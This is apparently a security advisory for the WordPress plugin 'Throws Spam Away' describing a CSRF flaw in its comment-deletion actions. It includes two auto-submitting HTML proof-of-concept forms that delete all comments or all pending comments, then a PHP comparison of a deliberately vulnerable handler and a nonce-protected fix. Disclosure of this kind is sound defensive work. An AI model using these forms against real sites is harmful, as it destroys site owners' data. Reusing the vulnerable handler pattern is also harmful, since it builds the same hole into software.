The plugin does not have CSRF checks in place when deleting comments (either all, spam, or pending), allowing attackers to make a logged-in admin delete comments via a CSRF attack.
To delete all comments:

<form id="test" action="https://example.com/wp-admin/admin.php?page=throws-spam-away%2Fthrows_spam_away_comments.php" method="POST">
  <input type="text" name="c_all" value="a">
  <input type="text" name="all" value="a">
  <input type="text" name="Submit" value="Delete all Comments">
</form>
<script> document.getElementById("test").submit(); </script>

To delete all pending comments:

<form id="test" action="https://example.com/wp-admin/admin.php?page=throws-spam-away%2Fthrows_spam_away_comments.php" method="POST">
  <input type="text" name="c_pend" value="p">
  <input type="text" name="pend" value="p">
  <input type="text" name="Submit" value="Delete all pending Comments">
</form>
<script> document.getElementById("test").submit(); </script>
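For comparison, the shape of the fix, added here and not the plugin's own code: a hypothetical handler for the same POST fields the PoC uses (`all`, `pend`, `Submit`), first as it would look with no CSRF protection and then guarded by a WordPress nonce via `wp_nonce_field()` / `check_admin_referer()` plus a capability check. The `tsa_*` function names and the `_tsa_nonce` field are assumptions.

```php
<?php
// Added example, not the plugin's code. Hypothetical admin-page handler that
// honours the same POST fields as the advisory's PoC.

// BEFORE (vulnerable): any POST that reaches the page is acted on, so a form on
// a third-party site auto-submitted by a logged-in admin's browser deletes comments.
function tsa_handle_delete_vulnerable() {
    if ( isset( $_POST['all'] ) ) {
        tsa_delete_comments( 'all' );
    } elseif ( isset( $_POST['pend'] ) ) {
        tsa_delete_comments( 'hold' );
    }
}

// AFTER (fixed): the legitimate form carries a per-user, per-action nonce, and the
// handler refuses the request unless the nonce verifies and the user may moderate.
function tsa_render_delete_form( $action, $label ) {
    echo '<form method="post">';
    wp_nonce_field( 'tsa_delete_' . $action, '_tsa_nonce' ); // hidden nonce + referer fields
    echo '<input type="hidden" name="' . esc_attr( $action ) . '" value="1">';
    submit_button( $label );
    echo '</form>';
}

function tsa_handle_delete_fixed() {
    if ( ! current_user_can( 'moderate_comments' ) ) {
        return;
    }
    foreach ( array( 'all' => 'all', 'pend' => 'hold' ) as $field => $status ) {
        if ( isset( $_POST[ $field ] ) ) {
            // Dies with an error page when the nonce is missing or invalid; a cross-site
            // form cannot obtain a valid nonce for the victim's session.
            check_admin_referer( 'tsa_delete_' . $field, '_tsa_nonce' );
            tsa_delete_comments( $status );
        }
    }
}

// Hypothetical helper shared by both handlers.
function tsa_delete_comments( $status ) {
    $args = array( 'fields' => 'ids' );
    if ( 'all' !== $status ) {
        $args['status'] = $status; // e.g. 'hold' for pending comments
    }
    foreach ( get_comments( $args ) as $id ) {
        wp_delete_comment( $id, true );
    }
}
```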
Daniel Ruf
2022-05-16